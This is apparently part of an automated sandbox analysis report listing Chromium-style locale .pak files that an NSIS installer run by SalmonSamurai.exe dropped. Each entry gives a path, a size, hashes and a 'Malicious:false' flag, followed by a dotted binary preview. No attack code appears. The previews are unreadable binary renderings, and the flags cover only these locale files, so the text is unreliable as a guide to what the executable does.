                                                                                                                                                                                                                                              Preview:............h.z...i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|."...}.4.....<.....A.....I.....Q.....Y.....`.....g.....n.....p.....u.............................,.....5.....].....k.....u...................................A.....p.....v...................................E.....`.........................................T.....y.....................................................8.....W.......................+.....F.....N.....V.....].....g.....x.............................+.....B....._.............................3.....B.....\.....r.........................................-.....J.....Q.....T.....e.....v.....................................................s............................./.....7.....J.....V.....b.......................$.....J.....w...................................G.....Z... .m...".....%.....(.....*.(...+.+...,.I.....m.../.....0.....1.....3.....4.+...5._...6.....7.....8.....9.G...;.W...<.i...=.}...>.....?.....@.....A.....C.V...D.}...E...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\fi.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):389118
                                                                                                                                                                                                                                              Entropy (8bit):5.427253181023048
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:nEbM+RtZ9eC6cMkohGZxGseSFOE/xaWEkLl5W5ucHiEi18OWUcrOShPGNgX1wL2:V+/upPgZxaS5W5xHiEi18OWUsU2
                                                                                                                                                                                                                                              MD5:D4B776267EFEBDCB279162C213F3DB22
                                                                                                                                                                                                                                              SHA1:7236108AF9E293C8341C17539AA3F0751000860A
                                                                                                                                                                                                                                              SHA-256:297E3647EAF9B3B95CF833D88239919E371E74CC345A2E48A5033EBE477CD54E
                                                                                                                                                                                                                                              SHA-512:1DC7D966D12E0104AACB300FD4E94A88587A347DB35AD2327A046EF833FB354FD9CBE31720B6476DB6C01CFCB90B4B98CE3CD995E816210B1438A13006624E8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:............h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.(...|.....}.@.....H.....M.....U.....].....e.....l.....s.....z.....{.....|...........................................................$....._.....x.....z.....~.....................................................7.....E.....R.....f.....v.....|...........................................................".....,.....2.....Q.....j.................................................................&.....3.....H.....N.....V...............................................!.....-.....>.....O.....R.....`.....r.............................................................................9.............................,.....?.....h.....w...........................................................5.....X............................................. .....".....%.....(.3...*.S...+.V...,.t........./.....0.....1.....3.....4.....5.6...6.p...7.....8.....9.....;.....<.....=.....>.....?.#...@.B...A.z...C.....D.....E...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\fil.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):438088
                                                                                                                                                                                                                                              Entropy (8bit):5.195613019166525
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:2zHaVyEDQV5aZrU+5xeuhGjZ3ZmA58Pm+7JATvy8:2zNMdU4XA5Imb
                                                                                                                                                                                                                                              MD5:3165351C55E3408EAA7B661FA9DC8924
                                                                                                                                                                                                                                              SHA1:181BEE2A96D2F43D740B865F7E39A1BA06E2CA2B
                                                                                                                                                                                                                                              SHA-256:2630A9D5912C8EF023154C6A6FB5C56FAF610E1E960AF66ABEF533AF19B90CAA
                                                                                                                                                                                                                                              SHA-512:3B1944EA3CFCBE98D4CE390EA3A8FF1F6730EB8054E282869308EFE91A9DDCD118290568C1FC83BD80E8951C4E70A451E984C27B400F2BDE8053EA25B9620655
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:..........].h.....i.....j.....k.....l.....n.....o.....p.&...r.,...s.=...t.F...v.[...w.h...y.n...z.}...|.....}...........................................................................................5.....<.....E.....d.....l.....y...................................................../.....E.....O.....^.....................................................".....8.......................................................................%.....J.....d.....~.................................................................+.....h.....q.....}...................................&.....4.....I.....o.....r................................................................. .....*.....5.....>.....O.................(.....0.................................................................,.....R.....l.............................6.....=.....H.....Y............... .....".....%.....(.....*.....+.....,.*.....B.../.W...0.`...1.....3.....4.....5.....6.....7.3...8.O...9.d...;.}...<.....=.....>.....?.....@.....A...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\fr.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):454982
                                                                                                                                                                                                                                              Entropy (8bit):5.385096169417585
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:07bju28t6QuagV1ZztzYpZ4MYnYM/LDBW5Mx0q20wCbKZL3wfzkCh1f/5FEs6rYr:6JVzbf55Z
                                                                                                                                                                                                                                              MD5:0BF28AFF31E8887E27C4CD96D3069816
                                                                                                                                                                                                                                              SHA1:B5313CF6B5FBCE7E97E32727A3FAE58B0F2F5E97
                                                                                                                                                                                                                                              SHA-256:2E1D413442DEF9CAE2D93612E3FD04F3AFAF3DD61E4ED7F86400D320AF5500C2
                                                                                                                                                                                                                                              SHA-512:95172B3B1153B31FCEB4B53681635A881457723CD1000562463D2F24712267B209B3588C085B89C985476C82D9C27319CB6378619889379DA4FAE1595CB11992
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........>...h.....i.....j.....k.....l.....n.....o."...p./...r.5...s.F...t.O...v.d...w.q...y.w...z.....|.....}...........................................................................................1.....<.....E.....g.....s.....{.....................................................+.....<.....I.....W..............................................."...........j.......................................................................,.....M.....p.......................................................................T.....b.....l.........................................+.....:.....R.....U.....l...................................................................................[.......................$.....9.....N.................................................................X.........................................$.....E.....O... .[...".t...%.....(.....*.....+.....,.........../.#...0.1...1.n...3.....4.....5.....6.....7.....8.4...9.J...;.]...<.k...=.}...>.....?.....@.....A.....C.(...D.:.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\gu.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):879149
                                                                                                                                                                                                                                              Entropy (8bit):4.32399215971305
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:Xz2UMY57hmdUoITsKMaWZKerbtsMhmksd4M+0+z20QmuOAl5VpvoxWnhygfZw/gQ:D2UMY57h9w4MSbsp5cLhdKE8
                                                                                                                                                                                                                                              MD5:7B5F52F72D3A93F76337D5CF3168EBD1
                                                                                                                                                                                                                                              SHA1:00D444B5A7F73F566E98ABADF867E6BB27433091
                                                                                                                                                                                                                                              SHA-256:798EA5D88A57D1D78FA518BF35C5098CBEB1453D2CB02EF98CD26CF85D927707
                                                                                                                                                                                                                                              SHA-512:10C6F4FAAB8CCB930228C1D9302472D0752BE19AF068EC5917249675B40F22AB24C3E29EC3264062826113B966C401046CFF70D91E7E05D8AADCC0B4E07FEC9B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........N...h.....i.....j.$...k.3...l.>...n.F...o.K...p.X...r.^...s.o...t.x...v.....w.....y.....z.....|.....}.............................................................................................................T.....l.................'.....).....5.....].......................4.....S.....i.............................l.................................................................'.....k.....t.....w.............................a.................;.....[.....n.....v.....}.......................+.....:.....f.......................X.....y...........].....s...................................6.....X.....w...............................................-.....L.....c....................... .....B.................Q.............................3.....?.....K.....}...................................o.............................3.....[... .a...".....%.....(.....*.g...+.j...,.........../.....0.....1.~...3.....4.....5.....6.[...7.....8.....9.....;.Q...<.h...=.....>.....?.....@.....A.D...C...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\he.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):544193
                                                                                                                                                                                                                                              Entropy (8bit):4.6265566170608325
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:DczykRrlOUmTU2/S9iyBZ60DAf1X2VeQCap4M52QoLpMzu5flmd9DnwWHQgZ:+F55VoQ
                                                                                                                                                                                                                                              MD5:6D787DC113ADFB6A539674AF7D6195DB
                                                                                                                                                                                                                                              SHA1:F966461049D54C61CDD1E48EF1EA0D3330177768
                                                                                                                                                                                                                                              SHA-256:A976FAD1CC4EB29709018C5FFCC310793A7CEB2E69C806454717CCAE9CBC4D21
                                                                                                                                                                                                                                              SHA-512:6748DAD2813FC544B50DDEA0481B5ACE3EB5055FB2D985CA357403D3B799618D051051B560C4151492928D6D40FCE9BB33B167217C020BDCC3ED4CAE58F6B676
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........)...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.%...v.:...w.G...y.M...z.\...|.b...}.t.....|.............................................................................2.....K.....^.....w.....................................................4.....O.....f.....y.............................%.....:....._.....r.....z...................................9.....A.....K.....g...............................................C.....m............................................... .....<.....d.....n...................................2.....}...................................!.....$.....7.....N.....a.....y................................................................._.........../.....9.............................".....:.....@.....L.....].....e.............................$....._............................................. .1...".L...%.}...(.....*.....+.....,.........../.....0.....1.W...3.l...4.....5.....6.....7.....8.1...9.E...;.Z...<.t...=.....>.....?.....@.....A.B...C.u.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\hi.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):921748
                                                                                                                                                                                                                                              Entropy (8bit):4.3093889077968495
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:zGFGsUtYgPLdROwJgdkFSvf4QAEm5dmGhsYK/GR3TX4/NMdpqdYnLsuFQdXPtg8y:zGEAgT/Zu5J57JtK
                                                                                                                                                                                                                                              MD5:1766A05BE4DC634B3321B5B8A142C671
                                                                                                                                                                                                                                              SHA1:B959BCADC3724AE28B5FE141F3B497F51D1E28CF
                                                                                                                                                                                                                                              SHA-256:0EEE8E751B5B0AF1E226106BEB09477634F9F80774FF30894C0F5A12B925AC35
                                                                                                                                                                                                                                              SHA-512:FAEC1D6166133674A56B5E38A68F9E235155CC910B5CCEB3985981B123CC29EDA4CD60B9313AB787EC0A8F73BF715299D9BF068E4D52B766A7AB8808BD146A39
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........"...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.,...w.9...y.?...z.N...|.T...}.f.....n.....s.....{.....................................................6.....X.....}.............................&.....@...................................%.....S.....y.......................&.............................Z.....j.....................................................2.....n.....w.....z.......................A.................).....o..............................................._.....n.................7.....T...............................................$.....n.....q............................./.....b.....i.....l.....n.........................................R...................................Z.....z...................................5.................q.................\...................................0... .K...".k...%.....(.....*.2...+.5...,.S........./.....0.....1.p...3.....4.....5.....6._...7.....8.....9.....;.^...<.r...=.....>.....?.....@.....A.;...C...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\hr.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):423481
                                                                                                                                                                                                                                              Entropy (8bit):5.516218200944141
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:yL0fCmEZW/FhjNmvgVRTKBOS+/6ocIG0uPXuyAF6WI6DkYAiKbeM/ogQbn7xjemW:QYCmNLjN3pV5v5tE77ORS
                                                                                                                                                                                                                                              MD5:8F9498D18D90477AD24EA01A97370B08
                                                                                                                                                                                                                                              SHA1:3868791B549FC7369AB90CD27684F129EBD628BE
                                                                                                                                                                                                                                              SHA-256:846943F77A425F3885689DCF12D62951C5B7646E68EADC533B8B5C2A1373F02E
                                                                                                                                                                                                                                              SHA-512:3C66A84592DEBE522F26C48B55C04198AD8A16C0DCFA05816825656C76C1C6CCCF5767B009F20ECB77D5A589EE44B0A0011EC197FEC720168A6C72C71EBF77FD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........h...h.2...i.C...j.O...k.^...l.i...n.q...o.v...p.....r.....s.....t.....v.....w.....y.....z.....|.....}...........................................%.....,.....-...........0.....Y.....e.....q.................................................................A.....T.....p.....x...........................................................".....*.....8.....G.....X.............................................................................%.....B.....c.......................................................................G.....U.....a.....w.............................................../.....2.....B.....S.....f.....|.................................................................(.....g.............................8.....l.....{.....................................................I.....h................................................... .....".0...%.U...(.r...*.....+.....,.........../.....0.....1.....3.)...4.F...5.d...6.....7.....8.....9.....;.....<.....=.....>.4...?.=...@.N...A.....C...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\hu.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):456789
                                                                                                                                                                                                                                              Entropy (8bit):5.643595706627357
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:SGAK2lkJ2gSSSfLOAYkky1MV5QgsZfGRAxY62R9PSam7EEOEeLvx5gR4RStG2r2/:pAKWkJ2gSsAkV5QgsiR4747vx5VL/
                                                                                                                                                                                                                                              MD5:F5E1CA8A14C75C6F62D4BFF34E27DDB5
                                                                                                                                                                                                                                              SHA1:7ABA6BFF18BDC4C477DA603184D74F054805C78F
                                                                                                                                                                                                                                              SHA-256:C0043D9FA0B841DA00EC1672D60015804D882D4765A62B6483F2294C3C5B83E0
                                                                                                                                                                                                                                              SHA-512:1050F96F4F79F681B3EAF4012EC0E287C5067B75BA7A2CBE89D9B380C07698099B156A0EB2CBC5B8AA336D2DAA98E457B089935B534C4D6636987E7E7E32B169
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........6...h.....i.....j.....k.....l.....n.....o.....p.....r.#...s.4...t.=...v.R...w._...y.e...z.t...|.z...}.....................................................................................2.....G.....W.....q.....................................................9.....X.....d.....}...............................................0.....5.....;.....N.....^.....s.....................................................-.....G.....d.....z.......................#.....?.....H.....P.....W.....].....l...............................................(.....Q.....x...........................................................;.....`.....u.....|...............................................1.......................b.....w...........................................................K.....l.......................5.....L.....T....._.....w............... .....".....%.....(.....*.8...+.;...,.Y.....j.../.....0.....1.....3.....4.....5.....6.P...7.k...8.....9.....;.....<.....=.....>.....?.....@.....A.0...C.U...D.b.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\id.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):373937
                                                                                                                                                                                                                                              Entropy (8bit):5.37852966615304
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:Fl9jv1p49ahfjDVnjHFsRmP28Wvr5PdhpvtEDSVsEaOq:FlLpblVnjHFCm+8Sr5Pdhzq
                                                                                                                                                                                                                                              MD5:7B39423028DA71B4E776429BB4F27122
                                                                                                                                                                                                                                              SHA1:CB052AB5F734D7A74A160594B25F8A71669C38F2
                                                                                                                                                                                                                                              SHA-256:3D95C5819F57A0AD06A118A07E0B5D821032EDCF622DF9B10A09DA9AA974885F
                                                                                                                                                                                                                                              SHA-512:E40679B01AB14B6C8DFDCE588F3B47BCAFF55DBB1539B343F611B3FCBD1D0E7D8C347A2B928215A629F97E5F68D19C51AF775EC27C6F906CAC131BEAE646CE1A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........@...h.....i.....j.....k.....l.....n.!...o.&...p.3...r.9...s.J...t.S...v.h...w.u...y.{...z.....|.....}.................................................................................................5.....=.....T.....[.....e.......................................................................,.....J.....[.....h.............................................................................;.....?.....B.....G.....[.....j.....~.................................................................*.....F.....L.....a.........................................6.....H.....Q.....\.....r.........................................................................................!.....'.....3.....a.........................................C.....M.....Y.....`.....h.....o.....v.........................................>.....Q.....V.....\.....i............... .....".....%.....(.....*.....+.....,.#.....3.../.B...0.F...1.z...3.....4.....5.....6.....7.....8.....9.'...;.5...<.>...=.K...>.`...?.h...@.y...A...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\it.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):414412
                                                                                                                                                                                                                                              Entropy (8bit):5.287149423624235
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:D58A43068BF847C7CD6284742C2F7823
                                                                                                                                                                                                                                              SHA1:497389765143FAC48AF2BD7F9A309BFE65F59ED9
                                                                                                                                                                                                                                              SHA-256:265D8B1BC479AD64FA7A41424C446139205AF8029A2469D558813EDD10727F9C
                                                                                                                                                                                                                                              SHA-512:547A1581DDA28C5C1A0231C736070D8A7B53A085A0CE643A4A1510C63A2D4670FF2632E9823CD25AE2C7CDC87FA65883E0A193853890D4415B38056CB730AB54
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........S...h.....i.....j.%...k.4...l.?...n.G...o.L...p.Y...r._...s.p...t.y...v.....w.....y.....z.....|.....}.........................................................................1.....D.....S.....l.....w.................................................................?.....F.....V.....d.....p.....}...............................................!.....7.....k.............................................................................O.....t.......................................................................>.....L.....Y.....v...........................................................3.....H.....[.....s.................................................................*.....u.............................,.....R.....Z.....n.....w...............................................3.....N............................................. .....".....%.....(.(...*.D...+.G...,.e.....v.../.....0.....1.....3.....4.....5.....6.}...7.....8.....9.....;.....<.....=.....>.....?.....@./...A.]...C.....D...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\ja.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):505292
                                                                                                                                                                                                                                              Entropy (8bit):5.701779406023226
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:D10D536BCD183030BA07FF5C61BF5E3A
                                                                                                                                                                                                                                              SHA1:44DD78DBA9F098AC61222EB9647D111AD1608960
                                                                                                                                                                                                                                              SHA-256:2A3D3ABC9F80BAD52BD6DA5769901E7B9E9F052B6A58A7CC95CE16C86A3AA85A
                                                                                                                                                                                                                                              SHA-512:C67AEDE9DED1100093253E350D6137AB8B2A852BD84B6C82BA1853F792E053CECD0EA0519319498AED5759BEDC66D75516A4F2F7A07696A0CEF24D5F34EF9DD2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:..........y.h.....i.....j.....k.....l.....m.....o.....p.....v.....w.....y.....z.....|.....}.0.....8.....=.....E.....P.....X.....g.....l.....t.....{...............................................$.....*.....<.....d.....y...................................).....S.....t...............................................'.....H.....c.....i.....x.............................5.....;.....M.....k...............................................E.....u.....................................................+.....R.....^.............................Q.....~...............................................#.....8.....d...........................................................V...........,.....2...................................5.....>.....J.....P.....Y.....t.............................8............................................. .....".....%.I...(.....*.....+.....,.........../.....0.#...1.h...3.....4.....5.....6.....7.4...8.R...9.p...;.....<.....=.....>.....?.....@.....A.E...C.l...D.....E.....F.....G...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\kn.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1012272
                                                                                                                                                                                                                                              Entropy (8bit):4.2289205973296395
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:C548A5F1FB5753408E44F3F011588594
                                                                                                                                                                                                                                              SHA1:E064AB403972036DAD1B35ABE9794E95DBE4CC00
                                                                                                                                                                                                                                              SHA-256:890F50A57B862F482D367713201E1E559AC778FC3A36322D1DFBBEF2535DD9CB
                                                                                                                                                                                                                                              SHA-512:6975E4BB1A90E0906CF6266F79DA6CC4AE32F72A6141943BCFCF9B33F791E9751A9AAFDE9CA537F33F6BA8E4D697125FBC2EC4FFD3BC35851F406567DAE7E631
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........m...h.<...i.M...j.Y...k.h...l.s...n.{...o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}...............................!.....(...../.....6.....7.....8.....=.................=.....}......................./.....A.............................:.......................&.....d.................-.....U.................6.....N.....j.................L.............................4.....C.....F.....d.................4.................e.........................................P.....o...............................................J...........,.....H.....v.................(.....+.....e.......................G.....................................................(...........V...................................H.....`.....................................................c.................e.......................0.....k......... .....".....%._...(.....*.....+.....,.......4.../.l...0.....1.....3.7...4.....5.....6.U...7.....8.....9.....;.O...<.l...=.....>.....?.....@.....A.....C.....D...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\ko.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):425545
                                                                                                                                                                                                                                              Entropy (8bit):6.081959799252044
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:B4FBFF56E4974A7283D564C6FC0365BE
                                                                                                                                                                                                                                              SHA1:DE68BD097DEF66D63D5FF04046F3357B7B0E23AC
                                                                                                                                                                                                                                              SHA-256:8C9ACDE13EDCD40D5B6EB38AD179CC27AA3677252A9CD47990EBA38AD42833E5
                                                                                                                                                                                                                                              SHA-512:0698AA058561BB5A8FE565BB0BEC21548E246DBB9D38F6010E9B0AD9DE0F59BCE9E98841033AD3122A163DD321EE4B11ED191277CDCB8E0B455D725593A88AA5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:............h.z...i.....j.....k.....l.....m.....o.....p.....r.....s.....t.....y.....z.....|.....}.......$.....).....1.....<.....D.....S.....X....._.....f.....h.....m...........................................................e.....u.....w.....{...............................................'.....F.....S.....f.....z...............................................$.....*.....3.....F.....Y....._.....b.....h.........................................8.....O.....U.....].....d.....m.....z................................... .....-.....W.....t.........................................,...../.....<.....L.....Y.....r.....................................................".......................s.................................................................=.....T...................................!.....'.....=.....O.....\... ._...".i...%.....(.....*.....+.....,.+.....A.../.^...0.j...1.....3.....4.....5.....6.=...7.S...8.j...9.z...;.....<.....=.....>.....?.....@.....A.....C.6...D.F...E.g...F.~...G...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\lt.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):457220
                                                                                                                                                                                                                                              Entropy (8bit):5.634955727013476
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:980C27FD74CC3560B296FE8E7C77D51F
                                                                                                                                                                                                                                              SHA1:F581EFA1B15261F654588E53E709A2692D8BB8A3
                                                                                                                                                                                                                                              SHA-256:41E0F3619CDA3B00ABBBF07B9CD64EC7E4785ED4C8A784C928E582C3B6B8B7DB
                                                                                                                                                                                                                                              SHA-512:51196F6F633667E849EF20532D57EC81C5F63BAB46555CEA8FAB2963A078ACDFA84843EDED85C3B30F49EF3CEB8BE9E4EF8237E214EF9ECFF6373A84D395B407
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........U...h.....i.....j.)...k.8...l.C...n.K...o.P...p.]...r.c...s.t...t.}...v.....w.....y.....z.....|.....}.........................................................................8.....F.....S.....g.....r.....................................................5.....T.....m.....v...............................................!.....6.....=.....F.....S.....a.....u.....................................................&.....<.....Z.....w.............................5.....>.....F.....M.....X.....j.....................................................-.....T.....m.....{.................................................................H.....O.....R.....S.....].....h.....o.....y.................).....x.............................G.....X.....v...............................................B.....d...............................................)... .>...".N...%.m...(.....*.....+.....,.........../.!...0.$...1.U...3.f...4.....5.....6.....7. ...8.@...9.T...;.b...<.s...=.....>.....?.....@.....A.....C.:.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\lv.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):455871
                                                                                                                                                                                                                                              Entropy (8bit):5.635474464056208
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:E4F7D9E385CB525E762ECE1AA243E818
                                                                                                                                                                                                                                              SHA1:689D784379BAC189742B74CD8700C687FEEEDED1
                                                                                                                                                                                                                                              SHA-256:523D141E59095DA71A41C14AEC8FE9EE667AE4B868E0477A46DD18A80B2007EF
                                                                                                                                                                                                                                              SHA-512:E4796134048CD12056D746F6B8F76D9EA743C61FEE5993167F607959F11FD3B496429C3E61ED5464551FD1931DE4878AB06F23A3788EE34BB56F53DB25BCB6DF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........e...h.,...i.=...j.I...k.X...l.c...n.k...o.p...p.}...r.....s.....t.....v.....w.....y.....z.....|.....}.................................................&.....'.....(.....*.....O.....b.....u.....................................................!.....%.....M.....].....s.....z...............................................!.....2.....8.....>.....Q.....e.....{...........................................................%.....7.....I.....g.....}...........................................................3.....7.....P.........................................+.....<.....O.....d.....v...........................................................".....#.....-.....8.....@.....G.....Y.................-.....8...................................%.....,.....;.....>.....I....._.............................#.....T.....i.....p.....y..................... .....".....%.....(.....*.....+.1...,.O.....r.../.....0.....1.....3.....4.....5.!...6.\...7.|...8.....9.....<.....=.....>.....?.....@.....A.9...C.X...D.e.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\ml.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1056673
                                                                                                                                                                                                                                              Entropy (8bit):4.264965642462621
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:8B38C65FC30210C7AF9B6FA0424266F4
                                                                                                                                                                                                                                              SHA1:116413710FFCF94FBFA38CB97A47731E43A306F5
                                                                                                                                                                                                                                              SHA-256:E8DF9A74417C5839C531D7CCAB63884A80AFB731CC62CBBB3FD141779086AC7D
                                                                                                                                                                                                                                              SHA-512:0FD349C644AC1A2E7ED0247E40900D3A9957F5BEF1351B872710D02687C934A8E63D3A7585E91F7DF78054AEFF8F7ABD8C93A94FCD20C799779A64278BAB2097
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........j...h.6...i.G...j.S...k.b...l.m...n.u...o.z...p.....r.....s.....t.....v.....w.....y.....z.....|.....}.....................................".....).....0.....1.....2.....7.................".....b.....}.......................N...........3.....5.....9.....a.......................M.....{.................@.....n...........!.....e.............................'.......................C.....}.............................H.................=.................P.....~.........................................v.................I.....j.........................................b...................................q.......................b.....i.....l.....n.............................1...........q.....'.....E...........N...........(.....`...................................;.............................Y.....4.............................;.....k... .....".....%.n...(.....*.....+.....,.M........./.....0.....1.}...3.....4.....5.>...6.....7.....8.....9.....;.....<.8...=.X...>.....?.....@.....A.....C...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\mr.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):863911
                                                                                                                                                                                                                                              Entropy (8bit):4.295071040310227
